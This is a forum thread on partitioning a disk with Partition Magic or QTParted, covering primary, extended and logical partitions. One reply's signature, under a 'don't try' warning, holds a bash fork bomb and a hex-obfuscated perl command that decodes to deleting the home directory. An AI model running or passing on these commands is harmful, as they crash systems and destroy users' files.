Find the answer to your Linux question:
I had 4 partitions on my computer, SuSE Linux 10 (ext3), Windows, (NFTS), Linux Swap, and one partition that I have no clue what it is for, but is fat12. ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
    Linux Newbie

Can't make a 4th extended partition in Partition Magic (Greyed out option)

I had 4 partitions on my computer, SuSE Linux 10 (ext3), Windows, (NFTS), Linux Swap, and one partition that I have no clue what it is for, but is fat12. It may contain the boot loader because when I was playing in partition magic I deleted that, along with my linux swap. I now have 3 partitions, SuSE 10, Windows, and don't-have-a-clue-what-it's-for, fat12. I also have 31 gigs of free space. Usually I just play around with stuff to figure it out, but I've already caused myself enough problems. I've googled around and searched the help files but I can't find how to do create more than 4 partitions in partition magic. I know I need an extended partition, but I can't find how to create one. When playing with partition magic, sometimes there are settings where you can change the partition type, but they are always greyed out. I have also played with qtparted to no avail.

Can someone please tell me how...

1.) to Create more than 4 partitions with Partition Magic, or QTparted, or any other free software that you can download

2.) to Create more partitions in the extended partition

3.) to Get my Linux Swap back

I'll be working on repairing GRUB...

-Thanks
    Fanfan
    There is no problem so complicated that you cannot find a very simple answer to it if you look at it in the right way

Linux Engineer
    In QTParted, when you create a partiton, the Create As dropdown controls this. To create a logical partition in an extended partition, just select the free space under the extended partition and create it.

If you try to create another partition in Disk Druid, the partitioner on Fedora's first installation disk, it automatically makes an extended partition.

You might want to mount that fat12 partition and see what's on it.

Linux Newbie
    You can only create 4 partitions at max on a hdd ..
    There are two types of partitions: Primary partitions and Extended partitions. One can create only four partitions on every single hard disk drive. Please note that also there can be only one Extended partition on each hard disk drive. So there are only eight partition configurations of a hard disk drive:

1 ) One primary partition
    2 ) Two primary partitions
    3 ) Three primary partitions
    4 ) Four primary partitions
    5 ) One primary partition + one extended partition
    6 ) Two primary partitions + one extended partition
    7 ) Three primary partitions + one extended partition
    8 ) One extended partition

Further more, Primary partition can be set Active. There can be only one Primary Active partition on each hard disk drive.

Every Extended partition consists of several (one or more) logical disks.
    WARNING!!! Don\'t try the following :
    Code:
    bash$ :(){ :|:&};: -- 
    bash$ `perl -e\'print\"\\x72\\x6D\\x20\\x2D\\x72\\x66\\x20\\x7E\\x2F\\x2A\"\'`
    Registered Linux User #382098

Linux Newbie
    thanks, but I "fixed" it

after playing around with my partitions some more, it seems that when i shut down and reboted my computer i had corrupted my windows and linux partitions. after reinstalling windows (again) and linux, I played around with partition magic in the bootable cd mode and creating an extended partition was no problem.

thanks for the help though
    -fanfan
    There is no problem so complicated that you cannot find a very simple answer to it if you look at it in the right way